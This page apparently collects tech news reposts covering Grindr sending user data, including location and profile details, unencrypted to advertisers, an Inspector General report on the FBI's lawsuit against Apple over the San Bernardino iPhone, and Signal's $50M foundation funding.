The SINTEF researchers found that precise GPS position, gender, age, “tribe” (e.g. bear, daddy), intention (e.g. friends, relationship), ethnicity, relationship status, language and device characteristics are sent over HTTP to a variety of advertising companies. A Grindr representative confirmed that location, age, and tribe are “sometimes” sent unencrypted. I’ve asked for clarification on this.

Not only is this extremely poor security practice, but Grindr appears to have been caught in a lie. The company told me last week when news of another security issue arose that “all information transmitted between a user’s device and our servers is encrypted and communicated in a way that does not reveal your specific location to unknown third parties.”

At the time I asked them about accusations that the app sent some data unencrypted; I never heard back. Fortunately for users, though unfortunately for Grindr, my question was answered by an independent body, and the above statement is evidently false.

It would be one thing to merely share this data with advertisers and other third parties — although it isn’t something many users would choose, presumably they at least consent to it as part of signing up.

But to send this information in the clear presents a material danger to the many gay people around the world who cannot openly identify as such. The details sent unencrypted are potentially enough to identify someone in, say, a coffee shop — and anyone in that coffee shop with a bit of technical knowledge could be monitoring for exactly those details. Identifying incriminating traffic in logs also could be done at the behest of one of the many governments that have outlawed homosexuality.

I’ve reached out to Grindr for comment and expect a statement soon; I’ll update this post as soon as I receive it.

Update: Here is Grindr’s full statement on the sharing of HIV data; notably it does not address the unencrypted transmission of other data.

As a company that serves the LGBTQ community, we understand the sensitivities around HIV status disclosure. Our goal is and always has been to support the health and safety of our users worldwide.

Recently, Grindr’s industry standard use of third party partners including Apptimize and Localytics, two highly-regarded software vendors, to test and validate the way we roll out our platform has drawn concern over the way we share user data.

In an effort to clear any misinformation we feel it necessary to state:

Grindr has never, nor will we ever sell personally identifiable user information – especially information regarding HIV status or last test date – to third parties or advertisers.

As an industry standard practice, Grindr does work with highly-regarded vendors to test and optimize how we roll out our platform. These vendors are under strict contractual terms that provide for the highest level of confidentiality, data security, and user privacy.

When working with these platforms, we restrict information shared except as necessary or appropriate. Sometimes this data may include location data or data from HIV status fields as these are features within Grindr, however, this information is always transmitted securely with encryption, and there are data retention policies in place to further protect our users’ privacy from disclosure.

It’s important to remember that Grindr is a public forum. We give users the option to post information about themselves including HIV status and last test date, and we make it clear in our privacy policy that if you chose to include this information in your profile, the information will also become public. As a result, you should carefully consider what information to include in your profile.

As an industry leader and champion for the LGBTQ community, Grindr, recognizes that a person’s HIV status can be highly stigmatized but after consulting several international health organizations and our Grindr For Equality team, Grindr determined with community feedback it would be beneficial for the health and well-being of our community to give users the option to publish, at their discretion, the user’s HIV Status and their Last Tested Date. It is up to each user to determine what, if anything, to share about themselves in their profile.

The inclusion of HIV status information within our platform is always regarded carefully with our users’ privacy in mind, but like any other mobile app company, we too must operate with industry standard practices to help make sure Grindr continues to improve for our community. We assure everyone that we are always examining our processes around privacy, security and data sharing with third parties, and always looking for additional measures that go above and beyond industry best practices to help maintain our users’ right to privacy.

Powered by WPeMatico

Inquiry finds FBI sued Apple to unlock phone without considering all options

Posted by | Apple, Apple vs. FBI, encryption, FBI, Gadgets, Government, Mobile, privacy, Security, TC | No Comments

The Office of the Inspector General has issued its report on the circumstances surrounding the FBI’s 2016 lawsuit attempting to force Apple to unlock an iPhone as part of a criminal investigation. While it stops short of saying the FBI was untruthful in its justification of going to court, the report is unsparing of the bureaucracy and clashing political motives that ultimately undermined that justification.

The official narrative, briefly summarized, is that the FBI wanted to get into a locked iPhone allegedly used in the San Bernardino attack in late 2015. Then-director Comey explained on February 9 that the Bureau did not have the capability to unlock the phone, and that as Apple was refusing to help voluntarily, a lawsuit would be filed compelling it to assist.

But then, a month later, a miracle occurred: a third-party had come forward with a working method to unlock the phone and the lawsuit would not be necessary after all.

Though this mooted the court proceedings, which were dropped, it only delayed the inevitable and escalating battle between tech and law enforcement — specifically the “going dark” problem of pervasive encryption. Privacy advocates saw the suit as a transparent (but abortive) attempt to set a precedent greatly expanding the extent to which tech companies would be required to help law enforcement. Apple of course fought tooth and nail.

In 2016 the OIG was contacted by Amy Hess, a former FBI Executive Assistant Director, who basically said that the process wasn’t nearly so clean as the Bureau made it out to be. In the course of its inquiries the Inspector General did find that to be the case, though although the FBI’s claims were not technically inaccurate or misleading, they also proved simply to be incorrect — and it is implied that they may have been allowed to be incorrect in order to further the “going dark” narrative.

The full report is quite readable (if you can mentally juggle the numerous acronyms), but the findings are essentially as follows.

Although Comey stated on February 9 that the FBI did not have the capability to unlock the phone and would seek legal remedy, the inquiry found that the Bureau had not exhausted all the avenues available to it, including some rather obvious ones.

Comey at a hearing in 2017

For instance, one senior engineer was tasked with asking trusted vendors if they had anything that could help — two days after Comey already said the FBI had no options left. Not only that, but there was official friction over whether classified tools generally reserved for national security purposes should be considered for this lesser, though obviously serious, criminal case.

In the first case, it turned out that yes, a vendor did have a solution “90 percent” done, and was happy to finish it up over the next month. How could the director have said that the FBI didn’t have the resources to do this, when it had not even asked its usual outside sources for help?

In the second, it’s still unclear whether there in fact exist classified tools that could have been brought to bear on the device in question. Testimony is conflicting on this point, with some officials saying that there was a “line in the sand” drawn between classified and unclassified tools, and another saying it was just a matter of preference. Regardless, those involved were less than forthcoming even within the Bureau, and even internal leadership was left wondering if there were solutions they hadn’t considered.

Hess, who brought the initial complaint to the OIG, was primarily concerned not that there was confusion in the ranks — it’s a huge organization and communication can be difficult — but that the search for a solution was deliberately allowed to fail in order that the case could act as a precedent advantageous to the FBI and other law enforcement agencies. Comey was known to be very concerned with the “going dark” issue and would likely have pursued such a case with vigor.

So the court case, Hess implied, was the real goal, and the meetings early in 2016 were formalities, nothing more than a paper trail to back up Comey’s statements. When a solution was actually found, because an engineer had taken initiative to ask around, officials hoping for a win in court were dismayed:

She became concerned that the CEAU Chief did not seem to want to find a technical solution, and that perhaps he knew of a solution but remained silent in order to pursue his own agenda of obtaining a favorable court ruling against Apple. According to EAD Hess, the problem with the Farook iPhone encryption was the “poster child” case for the Going Dark challenge.

The CEAU Chief told the OIG that, after the outside vendor came forward, he became frustrated that the case against Apple could no longer go forward, and he vented his frustration to the ROU Chief. He acknowledged that during this conversation between the two, he expressed disappointment that the ROU Chief had engaged an outside vendor to assist with the Farook iPhone, asking the ROU Chief, “Why did you do that for?”

While this doesn’t really imply a pattern of deception, it does suggest a willingness and ability on the part of FBI leadership to manipulate the situation to its advantage. A judge saying the likes of Apple must do everything possible to unlock an iPhone, and all forward ramifications of that, would be a tremendous coup for the Bureau and a major blow to user privacy.

The OIG ultimately recommends that the FBI “improve communication and coordination” so that this type of thing doesn’t happen (and it is reportedly doing so). Ironically, if the FBI had communicated to itself a bit better, the court case likely would have continued under pretenses that only its own leadership would know were false.

Powered by WPeMatico

Signal expands into the Signal Foundation with $50M from WhatsApp co-founder Brian Acton

Posted by | encryption, Fundings & Exits, Mobile, nonprofit, privacy, Security, signal, signal foundation, TC, WhatsApp | No Comments

 Perhaps the most surprising thing I learned about Signal when I spoke with Moxie Marlinspike, the app’s creator, last year at Disrupt, was that it was essentially running on a shoestring budget. A tool used by millions and feared by governments worldwide, barely getting by! But $50M from WhatsApp founder Brian Acton should help secure the app’s future. Read More

Powered by WPeMatico